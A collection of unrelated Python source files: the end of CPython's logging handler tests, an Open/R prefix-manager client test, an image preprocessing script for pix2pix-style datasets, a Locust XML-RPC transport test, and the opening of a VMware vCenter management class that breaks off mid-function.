for fn in self.rmfiles:
os.unlink(fn)
if os.path.exists(self.fn):
os.unlink(self.fn)
BaseTest.tearDown(self)
def assertLogFile(self, filename):
"Assert a log file is there and register it for deletion"
self.assertTrue(os.path.exists(filename),
msg="Log file %r does not exist" % filename)
self.rmfiles.append(filename)
class FileHandlerTest(BaseFileTest):
def test_delay(self):
os.unlink(self.fn)
fh = logging.FileHandler(self.fn, delay=True)
self.assertIsNone(fh.stream)
self.assertFalse(os.path.exists(self.fn))
fh.handle(logging.makeLogRecord({}))
self.assertIsNotNone(fh.stream)
self.assertTrue(os.path.exists(self.fn))
fh.close()
class RotatingFileHandlerTest(BaseFileTest):
def next_rec(self):
return logging.LogRecord('n', logging.DEBUG, 'p', 1,
self.next_message(), None, None, None)
def test_should_not_rollover(self):
# If maxbytes is zero rollover never occurs
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=0)
self.assertFalse(rh.shouldRollover(None))
rh.close()
def test_should_rollover(self):
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=1)
self.assertTrue(rh.shouldRollover(self.next_rec()))
rh.close()
def test_file_created(self):
# checks that the file is created and assumes it was created
# by us
rh = logging.handlers.RotatingFileHandler(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.close()
def test_rollover_filenames(self):
def namer(name):
return name + ".test"
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.namer = namer
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".1"))
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".2"))
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
@support.requires_zlib
def test_rotator(self):
def namer(name):
return name + ".gz"
def rotator(source, dest):
with open(source, "rb") as sf:
data = sf.read()
compressed = zlib.compress(data, 9)
with open(dest, "wb") as df:
df.write(compressed)
os.remove(source)
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.rotator = rotator
rh.namer = namer
m1 = self.next_rec()
rh.emit(m1)
self.assertLogFile(self.fn)
m2 = self.next_rec()
rh.emit(m2)
fn = namer(self.fn + ".1")
self.assertLogFile(fn)
newline = os.linesep
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
self.assertLogFile(fn)
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m2.msg + newline)
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
class TimedRotatingFileHandlerTest(BaseFileTest):
# other test methods added below
def test_rollover(self):
fh = logging.handlers.TimedRotatingFileHandler(self.fn, 'S',
backupCount=1)
fmt = logging.Formatter('%(asctime)s %(message)s')
fh.setFormatter(fmt)
r1 = logging.makeLogRecord({'msg': 'testing - initial'})
fh.emit(r1)
self.assertLogFile(self.fn)
time.sleep(1.1) # a little over a second ...
r2 = logging.makeLogRecord({'msg': 'testing - after delay'})
fh.emit(r2)
fh.close()
# At this point, we should have a recent rotated file which we
# can test for the existence of. However, in practice, on some
# machines which run really slowly, we don't know how far back
# in time to go to look for the log file. So, we go back a fair
# bit, and stop as soon as we see a rotated file. In theory this
# could of course still fail, but the chances are lower.
found = False
now = datetime.datetime.now()
GO_BACK = 5 * 60 # seconds
for secs in range(GO_BACK):
prev = now - datetime.timedelta(seconds=secs)
fn = self.fn + prev.strftime(".%Y-%m-%d_%H-%M-%S")
found = os.path.exists(fn)
if found:
self.rmfiles.append(fn)
break
msg = 'No rotated files found, went back %d seconds' % GO_BACK
if not found:
#print additional diagnostics
dn, fn = os.path.split(self.fn)
files = [f for f in os.listdir(dn) if f.startswith(fn)]
print('Test time: %s' % now.strftime("%Y-%m-%d %H-%M-%S"), file=sys.stderr)
print('The only matching files are: %s' % files, file=sys.stderr)
for f in files:
print('Contents of %s:' % f)
path = os.path.join(dn, f)
with open(path, 'r') as tf:
print(tf.read())
self.assertTrue(found, msg=msg)
def test_invalid(self):
assertRaises = self.assertRaises
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'X', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W7', delay=True)
def test_compute_rollover_daily_attime(self):
currentTime = 0
atTime = datetime.time(12, 0, 0)
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='MIDNIGHT', interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
actual = rh.computeRollover(currentTime)
self.assertEqual(actual, currentTime + 12 * 60 * 60)
actual = rh.computeRollover(currentTime + 13 * 60 * 60)
self.assertEqual(actual, currentTime + 36 * 60 * 60)
finally:
rh.close()
#@unittest.skipIf(True, 'Temporarily skipped while failures investigated.')
def test_compute_rollover_weekly_attime(self):
currentTime = int(time.time())
today = currentTime - currentTime % 86400
atTime = datetime.time(12, 0, 0)
wday = time.gmtime(today).tm_wday
for day in range(7):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='W%d' % day, interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
if wday > day:
# The rollover day has already passed this week, so we
# go over into next week
expected = (7 - wday + day)
else:
expected = (day - wday)
# At this point expected is in days from now, convert to seconds
expected *= 24 * 60 * 60
# Add in the rollover time
expected += 12 * 60 * 60
# Add in adjustment for today
expected += today
actual = rh.computeRollover(today)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
if day == wday:
# goes into following week
expected += 7 * 24 * 60 * 60
actual = rh.computeRollover(today + 13 * 60 * 60)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
finally:
rh.close()
def secs(**kw):
return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
for when, exp in (('S', 1),
('M', 60),
('H', 60 * 60),
('D', 60 * 60 * 24),
('MIDNIGHT', 60 * 60 * 24),
# current time (epoch start) is a Thursday, W0 means Monday
('W0', secs(days=4, hours=24)),
):
def test_compute_rollover(self, when=when, exp=exp):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when=when, interval=1, backupCount=0, utc=True)
currentTime = 0.0
actual = rh.computeRollover(currentTime)
if exp != actual:
# Failures occur on some systems for MIDNIGHT and W0.
# Print detailed calculation for MIDNIGHT so we can try to see
# what's going on
if when == 'MIDNIGHT':
try:
if rh.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
currentMinute) * 60 +
currentSecond)
result = currentTime + r
print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
print('currentHour: %s' % currentHour, file=sys.stderr)
print('currentMinute: %s' % currentMinute, file=sys.stderr)
print('currentSecond: %s' % currentSecond, file=sys.stderr)
print('r: %s' % r, file=sys.stderr)
print('result: %s' % result, file=sys.stderr)
except Exception:
print('exception in diagnostic code: %s' % sys.exc_info()[1], file=sys.stderr)
self.assertEqual(exp, actual)
rh.close()
setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
@unittest.skipUnless(win32evtlog, 'win32evtlog/win32evtlogutil/pywintypes required for this test.')
class NTEventLogHandlerTest(BaseTest):
def test_basic(self):
logtype = 'Application'
elh = win32evtlog.OpenEventLog(None, logtype)
num_recs = win32evtlog.GetNumberOfEventLogRecords(elh)
try:
h = logging.handlers.NTEventLogHandler('test_logging')
except pywintypes.error as e:
if e.winerror == 5: # access denied
raise unittest.SkipTest('Insufficient privileges to run test')
raise
r = logging.makeLogRecord({'msg': 'Test Log Message'})
h.handle(r)
h.close()
# Now see if the event is recorded
self.assertLess(num_recs, win32evtlog.GetNumberOfEventLogRecords(elh))
flags = win32evtlog.EVENTLOG_BACKWARDS_READ | \
win32evtlog.EVENTLOG_SEQUENTIAL_READ
found = False
GO_BACK = 100
events = win32evtlog.ReadEventLog(elh, flags, GO_BACK)
for e in events:
if e.SourceName != 'test_logging':
continue
msg = win32evtlogutil.SafeFormatMessage(e, logtype)
if msg != 'Test Log Message\r\n':
continue
found = True
break
msg = 'Record not found in event log, went back %d records' % GO_BACK
self.assertTrue(found, msg=msg)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@support.run_with_locale('LC_ALL', '')
def test_main():
support.run_unittest(
BuiltinLevelsTest, BasicFilterTest, CustomLevelsAndFiltersTest,
HandlerTest, MemoryHandlerTest, ConfigFileTest, SocketHandlerTest,
DatagramHandlerTest, MemoryTest, EncodingTest, WarningsTest,
ConfigDictTest, ManagerTest, FormatterTest, BufferingFormatterTest,
StreamHandlerTest, LogRecordFactoryTest, ChildLoggerTest,
QueueHandlerTest, ShutdownTest, ModuleLevelMiscTest, BasicConfigTest,
LoggerAdapterTest, LoggerTest, SMTPHandlerTest, FileHandlerTest,
RotatingFileHandlerTest, LastResortTest, LogRecordTest,
ExceptionTest, SysLogHandlerTest, HTTPHandlerTest,
NTEventLogHandlerTest, TimedRotatingFileHandlerTest,
UnixSocketHandlerTest, UnixDatagramHandlerTest, UnixSysLogHandlerTest)
if __name__ == "__main__":
test_main()
|
prefix_mgr_client_tests.py
|
#!/usr/bin/env python
#
# Copyright (c) 2014-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from openr.utils import socket
from openr.clients import prefix_mgr_client
from openr.PrefixManager import ttypes as prefix_mgr_types
from openr.Lsdb import ttypes as lsdb_types
from openr.cli.utils.utils import ip_str_to_prefix, sprint_prefix
import zmq
import unittest
from multiprocessing import Process
prefix_entry1 = lsdb_types.PrefixEntry(
prefix=ip_str_to_prefix('2620:0:1cff:dead:bef1:ffff:ffff:1/128'),
type=lsdb_types.PrefixType.LOOPBACK)
prefix_entry2 = lsdb_types.PrefixEntry(
prefix=ip_str_to_prefix('2620:0:1cff:dead:bef1:ffff:ffff:2/128'),
type=lsdb_types.PrefixType.LOOPBACK)
prefix_entry3 = lsdb_types.PrefixEntry(
prefix=ip_str_to_prefix('2620:0:1cff:dead:bef1:ffff:ffff:3/128'),
type=lsdb_types.PrefixType.LOOPBACK)
class PrefixMgr():
def __init__(self, zmq_ctx, url):
self._prefix_mgr_server_socket = socket.Socket(zmq_ctx, zmq.REP)
self._prefix_mgr_server_socket.bind(url)
self._prefix_map = {sprint_prefix(prefix_entry1.prefix): prefix_entry1,
sprint_prefix(prefix_entry2.prefix): prefix_entry2,
sprint_prefix(prefix_entry3.prefix): prefix_entry3}
def process_request(self):
req = self._prefix_mgr_server_socket.recv_thrift_obj(
prefix_mgr_types.PrefixManagerRequest)
if req.cmd == prefix_mgr_types.PrefixManagerCommand.ADD_PREFIXES:
for prefix_entry in req.prefixes:
self._prefix_map[sprint_prefix(prefix_entry.prefix)] = prefix_entry
self._prefix_mgr_server_socket.send_thrift_obj(
prefix_mgr_types.PrefixManagerResponse(success=True))
if req.cmd == prefix_mgr_types.PrefixManagerCommand.WITHDRAW_PREFIXES:
success = False
for prefix_entry in req.prefixes:
prefix_str = sprint_prefix(prefix_entry.prefix)
if prefix_str in self._prefix_map:
del self._prefix_map[prefix_str]
success = True
self._prefix_mgr_server_socket.send_thrift_obj(
prefix_mgr_types.PrefixManagerResponse(success=success))
if req.cmd == prefix_mgr_types.PrefixManagerCommand.GET_ALL_PREFIXES:
resp = prefix_mgr_types.PrefixManagerResponse()
resp.prefixes = self._prefix_map.values()
resp.success = True
self._prefix_mgr_server_socket.send_thrift_obj(resp)
class TestPrefixMgrClient(unittest.TestCase):
def test(self):
PrefixMgr(zmq.Context(), "tcp://*:5000")
num_req = 5
def _prefix_mgr_server():
prefix_mgr_server = PrefixMgr(zmq.Context(), "tcp://*:5000")
for _ in range(num_req):
prefix_mgr_server.process_request()
def _prefix_mgr_client():
prefix_mgr_client_inst = prefix_mgr_client.PrefixMgrClient(
zmq.Context(), "tcp://localhost:5000")
resp = prefix_mgr_client_inst.add_prefix(
['2620:0:1cff:dead:bef1:ffff:ffff:4/128'], 'LOOPBACK')
self.assertTrue(resp.success)
resp = prefix_mgr_client_inst.view_prefix()
prefix_entry4 = lsdb_types.PrefixEntry(
prefix=ip_str_to_prefix('2620:0:1cff:dead:bef1:ffff:ffff:4/128'),
type=lsdb_types.PrefixType.LOOPBACK)
self.assertTrue(resp.success)
self.assertTrue(prefix_entry4 in resp.prefixes)
resp = prefix_mgr_client_inst.withdraw_prefix(
['2620:0:1cff:dead:bef1:ffff:ffff:4/128'])
self.assertTrue(resp.success)
resp = prefix_mgr_client_inst.view_prefix()
self.assertTrue(resp.success)
self.assertFalse(prefix_entry4 in resp.prefixes)
resp = prefix_mgr_client_inst.withdraw_prefix(
['2620:0:1cff:dead:bef1:ffff:ffff:5/128'])
self.assertFalse(resp.success)
p = Process(target=_prefix_mgr_server)
p.start()
q = Process(target=_prefix_mgr_client)
q.start()
p.join()
q.join()
|
process.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os
import tempfile
import subprocess
import tensorflow as tf
import numpy as np
import tfimage as im
import threading
import time
import multiprocessing
edge_pool = None
parser = argparse.ArgumentParser()
parser.add_argument("--input_dir", required=True, help="path to folder containing images")
parser.add_argument("--output_dir", required=True, help="output path")
parser.add_argument("--operation", required=True, choices=["grayscale", "resize", "blank", "combine", "edges"])
parser.add_argument("--workers", type=int, default=1, help="number of workers")
# resize
parser.add_argument("--pad", action="store_true", help="pad instead of crop for resize operation")
parser.add_argument("--size", type=int, default=256, help="size to use for resize operation")
# combine
parser.add_argument("--b_dir", type=str, help="path to folder containing B images for combine operation")
a = parser.parse_args()
if __name__ == '__main__':
def resize(src):
height, width, _ = src.shape
dst = src
if height != width:
if a.pad:
size = max(height, width)
# pad to correct ratio
oh = (size - height) // 2
ow = (size - width) // 2
dst = im.pad(image=dst, offset_height=oh, offset_width=ow, target_height=size, target_width=size)
else:
# crop to correct ratio
size = min(height, width)
oh = (height - size) // 2
ow = (width - size) // 2
dst = im.crop(image=dst, offset_height=oh, offset_width=ow, target_height=size, target_width=size)
assert(dst.shape[0] == dst.shape[1])
size, _, _ = dst.shape
if size > a.size:
dst = im.downscale(images=dst, size=[a.size, a.size])
elif size < a.size:
dst = im.upscale(images=dst, size=[a.size, a.size])
return dst
def blank(src):
height, width, _ = src.shape
if height != width:
raise Exception("non-square image")
image_size = width
size = int(image_size * 0.3)
offset = int(image_size / 2 - size / 2)
dst = src
dst[offset:offset + size,offset:offset + size,:] = np.ones([size, size, 3])
return dst
def combine(src, src_path):
if a.b_dir is None:
raise Exception("missing b_dir")
# find corresponding file in b_dir, could have a different extension
basename, _ = os.path.splitext(os.path.basename(src_path))
for ext in [".png", ".jpg"]:
sibling_path = os.path.join(a.b_dir, basename + ext)
if os.path.exists(sibling_path):
sibling = im.load(sibling_path)
break
else:
raise Exception("could not find sibling image for " + src_path)
# make sure that dimensions are correct
height, width, _ = src.shape
if height != sibling.shape[0] or width != sibling.shape[1]:
raise Exception("differing sizes")
# convert both images to RGB if necessary
if src.shape[2] == 1:
src = im.grayscale_to_rgb(images=src)
if sibling.shape[2] == 1:
sibling = im.grayscale_to_rgb(images=sibling)
# remove alpha channel
if src.shape[2] == 4:
src = src[:,:,:3]
if sibling.shape[2] == 4:
sibling = sibling[:,:,:3]
return np.concatenate([src, sibling], axis=1)
def grayscale(src):
return im.grayscale_to_rgb(images=im.rgb_to_grayscale(images=src))
net = None
def run_caffe(src):
# lazy load caffe and create net
global net
if net is None:
# don't require caffe unless we are doing edge detection
os.environ["GLOG_minloglevel"] = "2" # disable logging from caffe
import caffe
# using this requires using the docker image or assembling a bunch of dependencies
# and then changing these hardcoded paths
net = caffe.Net("./caffe/examples/hed/deploy.prototxt", "./caffe/hed_pretrained_bsds.caffemodel", caffe.TEST)
net.blobs["data"].reshape(1, np.array(src).size)
net.blobs["data"].data[...] = src
net.forward()
return net.blobs["sigmoid-fuse"].data[0][0,:,:]
def edges(src):
# based on https://github.com/phillipi/pix2pix/blob/master/scripts/edges/batch_hed.py
# and https://github.com/phillipi/pix2pix/blob/master/scripts/edges/PostprocessHED.m
import scipy.io
src = src * 255
border = 128 # put a padding around images since edge detection seems to detect edge of image
src = src[:,:,:3] # remove alpha channel if present
src = np.pad(src, ((border, border), (border, border), (0,0)), "reflect")
src = src[:,:,::-1]
src = src - np.array((104.00698793,116.66876762,122.67891434))
src = src.transpose((2, 0, 1))
# [height, width, channels] => [batch, channel, height, width]
fuse = edge_pool.apply(run_caffe([src]))
fuse = fuse[border:-border, border:-border]
with tempfile.NamedTemporaryFile(suffix=".png") as png_file, tempfile.NamedTemporaryFile(suffix=".mat") as mat_file:
scipy.io.savemat(mat_file.name, {"input": fuse})
octave_code = r"""
E = 1-load(input_path).input;
E = imresize(E, [image_width,image_width]);
E = 1 - E;
E = single(E);
[Ox, Oy] = gradient(convTri(E, 4), 1);
[Oxx, ~] = gradient(Ox, 1);
[Oxy, Oyy] = gradient(Oy, 1);
O = mod(atan(Oyy .* sign(-Oxy) ./ (Oxx + 1e-5)), pi);
E = edgesNmsMex(E, O, 1, 5, 1.01, 1);
E = double(E >= max(eps, threshold));
E = bwmorph(E, 'thin', inf);
E = bwareaopen(E, small_edge);
E = 1 - E;
E = uint8(E * 255);
imwrite(E, output_path);
"""
config = dict(
input_path="'%s'" % mat_file.name,
output_path="'%s'" % png_file.name,
image_width=256,
threshold=25.0/255.0,
small_edge=5,
)
args = ["octave"]
for k, v in config.items():
args.extend(["--eval", "%s=%s;" % (k, v)])
args.extend(["--eval", octave_code])
try:
subprocess.check_output(args, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
print("octave failed")
print("returncode:", e.returncode)
print("output:", e.output)
raise
return im.load(png_file.name)
def process(src_path, dst_path):
src = im.load(src_path)
if a.operation == "grayscale":
dst = grayscale(src)
elif a.operation == "resize":
dst = resize(src)
elif a.operation == "blank":
dst = blank(src)
elif a.operation == "combine":
dst = combine(src, src_path)
elif a.operation == "edges":
dst = edges(src)
else:
raise Exception("invalid operation")
im.save(dst, dst_path)
complete_lock = threading.Lock()
start = None
num_complete = 0
total = 0
def complete():
global num_complete, rate, last_complete
with complete_lock:
num_complete += 1
now = time.time()
elapsed = now - start
rate = num_complete / elapsed
if rate > 0:
remaining = (total - num_complete) / rate
else:
remaining = 0
print("%d/%d complete %0.2f images/sec %dm%ds elapsed %dm%ds remaining" % (num_complete, total, rate, elapsed // 60, elapsed % 60, remaining // 60, remaining % 60))
last_complete = now
def main():
if not os.path.exists(a.output_dir):
os.makedirs(a.output_dir)
src_paths = []
dst_paths = []
skipped = 0
for src_path in im.find(a.input_dir):
name, _ = os.path.splitext(os.path.basename(src_path))
dst_path = os.path.join(a.output_dir, name + ".png")
if os.path.exists(dst_path):
skipped += 1
else:
src_paths.append(src_path)
dst_paths.append(dst_path)
print("skipping %d files that already exist" % skipped)
global total
total = len(src_paths)
print("processing %d files" % total)
global start
start = time.time()
if a.operation == "edges":
# use a multiprocessing pool for this operation so it can use multiple CPUs
# create the pool before we launch processing threads
global edge_pool
edge_pool = multiprocessing.Pool(a.workers)
if a.workers == 1:
with tf.Session() as sess:
for src_path, dst_path in zip(src_paths, dst_paths):
process(src_path, dst_path)
complete()
else:
queue = tf.train.input_producer(zip(src_paths, dst_paths), shuffle=False, num_epochs=1)
dequeue_op = queue.dequeue()
def worker(coord):
with sess.as_default():
while not coord.should_stop():
try:
src_path, dst_path = sess.run(dequeue_op)
except tf.errors.OutOfRangeError:
coord.request_stop()
break
process(src_path, dst_path)
complete()
# init epoch counter for the queue
local_init_op = tf.local_variables_initializer()
with tf.Session() as sess:
sess.run(local_init_op)
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(coord=coord)
for i in range(a.workers):
t = threading.Thread(target=worker, args=(coord,))
t.start()
threads.append(t)
try:
coord.join(threads)
except KeyboardInterrupt:
coord.request_stop()
coord.join(threads)
main()
|
test_transport.py
|
import unittest
from threading import Thread
from six.moves.xmlrpc_client import ServerProxy
from locust_xmlrpc import LocustXmlRpcTransport
from locust.stats import global_stats
class TestTransport(unittest.TestCase):
def setUp(self):
from .server import server, start_server
self.server = server
Thread(target=start_server).start()
self.client = ServerProxy(
'http://localhost:8000/RPC2',
transport=LocustXmlRpcTransport()
)
global_stats.reset_all()
def test_returns_something(self):
res = self.client.add(2, 2)
self.assertEqual(res, 4)
stats = global_stats.get('/RPC2', 'xmlrpc')
self.assertEqual(stats.num_requests, 1)
def test_failure(self):
self.client.failure('01', 'Test Error')
stats = global_stats.get('/RPC2', 'xmlrpc')
self.assertEqual(stats.num_failures, 1)
def test_failure_not_found(self):
self.client.method_doesnt_exist()
stats = global_stats.get('/RPC2', 'xmlrpc')
self.assertEqual(stats.num_failures, 1)
def test_delay(self):
delayed_ms = 500
res = self.client.delayed(delayed_ms)
stats = global_stats.get('/RPC2', 'xmlrpc')
self.assertEqual(res, delayed_ms)
self.assertEqual(stats.num_requests, 1)
self.assertGreaterEqual(stats.avg_response_time, delayed_ms)
def tearDown(self):
self.server.shutdown()
if __name__ == '__main__':
unittest.main()
|
virtualcenter.py
|
# coding: utf-8
"""Backend management system classes
Used to communicate with providers without using CFME facilities
"""
from __future__ import absolute_import
import atexit
import operator
import re
import ssl
import threading
import time
from datetime import datetime
from distutils.version import LooseVersion
from functools import partial
import pytz
import six
from cached_property import threaded_cached_property
from pyVim.connect import Disconnect, SmartConnect
from pyVmomi import vim, vmodl
from wait_for import TimedOutError, wait_for
from wrapanapi.entities import (Template, TemplateMixin, Vm, VmMixin,
VmState)
from wrapanapi.entities.base import Entity
from wrapanapi.exceptions import (HostNotRemoved, NotFoundError,
VMCreationDateError, VMInstanceNotCloned,
VMInstanceNotFound, VMInstanceNotSuspended,
VMNotFoundViaIP)
from wrapanapi.systems.base import System
SELECTION_SPECS = [
'resource_pool_traversal_spec',
'resource_pool_vm_traversal_spec',
'folder_traversal_spec',
'datacenter_host_traversal_spec',
'datacenter_vm_traversal_spec',
'compute_resource_rp_traversal_spec',
'compute_resource_host_traversal_spec',
'host_vm_traversal_spec',
'datacenter_datastore_traversal_spec'
]
TRAVERSAL_SPECS = [
{
'name': 'resource_pool_traversal_spec',
'type': vim.ResourcePool,
'path': 'resourcePool',
'select_indices': [0, 1]
},
{
'name': 'resource_pool_vm_traversal_spec',
'type': vim.ResourcePool,
'path': 'vm',
'select_indices': []
},
{
'name': 'compute_resource_rp_traversal_spec',
'type': vim.ComputeResource,
'path': 'resourcePool',
'select_indices': [0, 1]
},
{
'name': 'compute_resource_host_traversal_spec',
'type': vim.ComputeResource,
'path': 'host',
'select_indices': []
},
{
'name': 'datacenter_host_traversal_spec',
'type': vim.Datacenter,
'path': 'hostFolder',
'select_indices': [2]
},
{
'name': 'datacenter_datastore_traversal_spec',
'type': vim.Datacenter,
'path': 'datastoreFolder',
'select_indices': [2]
},
{
'name': 'datacenter_vm_traversal_spec',
'type': vim.Datacenter,
'path': 'vmFolder',
'select_indices': [2]
},
{
'name': 'host_vm_traversal_spec',
'type': vim.HostSystem,
'path': 'vm',
'select_indices': [2]
},
{
'name': 'folder_traversal_spec',
'type': vim.Folder,
'path': 'childEntity',
'select_indices': [2, 3, 4, 5, 6, 7, 1, 8]
}
]
def get_task_error_message(task):
"""Depending on the error type, a different attribute may contain the error message. This
function will figure out the error message.
"""
message = "faultCause='{}', faultMessage='{}', localizedMessage='{}'".format(
task.info.error.faultCause if hasattr(task.info.error, 'faultCause') else "",
task.info.error.faultMessage if hasattr(task.info.error, 'faultMessage') else "",
task.info.error.localizedMessage if hasattr(task.info.error, 'localizedMessage') else ""
)
return message
class VMWareVMOrTemplate(Entity):
"""
Holds shared methods/properties that VM's and templates have in common.
A VM and a template are the same object type in pyVmomi, due to this they
share many common operations
A template will have 'config.template'==True
"""
def __init__(self, system, raw=None, **kwargs):
"""
Construct a VMWareVirtualMachine instance
Args:
system: instance of VMWareSystem
raw: pyVmomi.vim.VirtualMachine object
name: name of VM
"""
super(VMWareVMOrTemplate, self).__init__(system, raw, **kwargs)
self._name = raw.name if raw else kwargs.get('name')
if not self._name:
raise ValueError("missing required kwarg 'name'")
@property
def _identifying_attrs(self):
return {'name': self._name}
@property
def name(self):
return self._name
def refresh(self):
"""
Implemented in the VMWareVirtualMachine and VMWareTemplate classes.
"""
raise NotImplementedError
@property
def uuid(self):
try:
return str(self.raw.summary.config.uuid)
except AttributeError:
return self.name
@property
def host(self):
self.refresh()
return self.raw.runtime.host.name
def delete(self):
self.logger.info(" Deleting vSphere VM/template %s", self.name)
task = self.raw.Destroy_Task()
try:
wait_for(lambda: self.system.get_task_status(task) == 'success', delay=3, timeout="4m")
except TimedOutError:
self.logger.warn("Hit TimedOutError waiting for VM '%s' delete task", self.name)
if self.exists:
return False
return True
def cleanup(self):
return self.delete()
def rename(self, new_name):
task = self.raw.Rename_Task(newName=new_name)
# Cycle until the new named VM/template is found
# That must happen or the error state can come up too
old_name = self._name
self._name = new_name
while not self.exists:
if self.system.get_task_status(task) == "error":
self._name = old_name
return False
time.sleep(0.5)
# The newly renamed VM/template is found
return True
def get_hardware_configuration(self):
self.refresh()
return {
'ram': self.raw.config.hardware.memoryMB,
'cpu': self.raw.config.hardware.numCPU,
}
def get_datastore_path(self, vm_config_datastore):
datastore_url = [str(datastore.url)
for datastore in self.raw.config.datastoreUrl
if datastore.name in vm_config_datastore]
return datastore_url.pop()
def get_config_files_path(self):
self.refresh()
vmfilespath = self.raw.config.files.vmPathName
return str(vmfilespath)
@staticmethod
def _progress_log_callback(logger, source, destination, progress):
logger.info("Provisioning progress {}->{}: {}".format(
source, destination, str(progress)))
def _pick_datastore(self, allowed_datastores):
"""Pick a datastore based on free space."""
possible_datastores = [
ds for ds in self.system.get_obj_list(vim.Datastore)
if ds.name in allowed_datastores and ds.summary.accessible and
ds.summary.multipleHostAccess and ds.overallStatus != "red"]
possible_datastores.sort(
key=lambda ds: float(ds.summary.freeSpace) / float(ds.summary.capacity),
reverse=True)
if not possible_datastores:
raise Exception("No possible datastores!")
return possible_datastores[0]
def _get_resource_pool(self, resource_pool_name=None):
""" Returns a resource pool managed object for a specified name.
Args:
resource_pool_name (string): The name of the resource pool. If None, first one will be
picked.
Returns:
pyVmomi.vim.ResourcePool: The managed object of the resource pool.
"""
if resource_pool_name is not None:
return self.system.get_obj(vim.ResourcePool, resource_pool_name)
elif self.system.default_resource_pool is not None:
return self.system.get_obj(vim.ResourcePool, self.system.default_resource_pool)
return self.system.get_obj_list(vim.ResourcePool)[0]
def _clone(self, destination, resourcepool=None, datastore=None, power_on=True,
sparse=False, template=False, provision_timeout=1800, progress_callback=None,
allowed_datastores=None, cpu=None, ram=None, relocate=False, host=None, **kwargs):
"""Clone this template to a VM
When relocate is True, relocated (migrated) with VMRelocateSpec instead of being cloned
Returns a VMWareVirtualMachine object
"""
try:
vm = self.system.get_vm(destination)
except VMInstanceNotFound:
vm = None
if vm and not relocate:
raise Exception("VM/template of the name {} already present!".format(destination))
if progress_callback is None:
progress_callback = partial(
self._progress_log_callback, self.logger, self.name, destination)
source_template = self.raw
vm_clone_spec = vim.VirtualMachineCloneSpec()
vm_reloc_spec = vim.VirtualMachineRelocateSpec()
# DATASTORE
if isinstance(datastore, six.string_types):
vm_reloc_spec.datastore = self.system.get_obj(vim.Datastore, name=datastore)
elif isinstance(datastore, vim.Datastore):
vm_reloc_spec.datastore = datastore
elif datastore is None:
if allowed_datastores is not None:
# Pick a datastore by space
vm_reloc_spec.datastore = self._pick_datastore(allowed_datastores)
else:
# Use the same datastore
datastores = source_template.datastore
if isinstance(datastores, (list, tuple)):
vm_reloc_spec.datastore = datastores[0]
else:
vm_reloc_spec.datastore = datastores
else:
raise NotImplementedError("{} not supported for datastore".format(datastore))
progress_callback("Picked datastore `{}`".format(vm_reloc_spec.datastore.name))
# RESOURCE POOL
if isinstance(resourcepool, vim.ResourcePool):
vm_reloc_spec.pool = resourcepool
else:
vm_reloc_spec.pool = self._get_resource_pool(resourcepool)
progress_callback("Picked resource pool `{}`".format(vm_reloc_spec.pool.name))
vm_reloc_spec.host = (host if isinstance(host, vim.HostSystem)
else self.system.get_obj(vim.HostSystem, host)) # could be none
if sparse:
vm_reloc_spec.transform = vim.VirtualMachineRelocateTransformation().sparse
else:
vm_reloc_spec.transform = vim.VirtualMachineRelocateTransformation().flat
vm_clone_spec.powerOn = power_on
vm_clone_spec.template = template
vm_clone_spec.location = vm_reloc_spec
vm_clone_spec.snapshot = None
if cpu is not None:
vm_clone_spec.config.numCPUs = int(cpu)
if ram is not None:
vm_clone_spec.config.memoryMB = int(ram)
try:
folder = source_template.parent.parent.vmParent
except AttributeError:
folder = source_template.parent
progress_callback("Picked folder `{}`".format(folder.name))
action = source_template.RelocateVM_Task if relocate else source_template.CloneVM_Task
action_args = dict(spec=vm_reloc_spec) if relocate else dict(folder=folder,
name=destination,
spec=vm_clone_spec)
task = action(**action_args)
def _check(store=[task]):
try:
if hasattr(store[0].info, 'progress') and store[0].info.progress is not None:
progress_callback("{}/{}%".format(store[0].info.state, store[0].info.progress))
else:
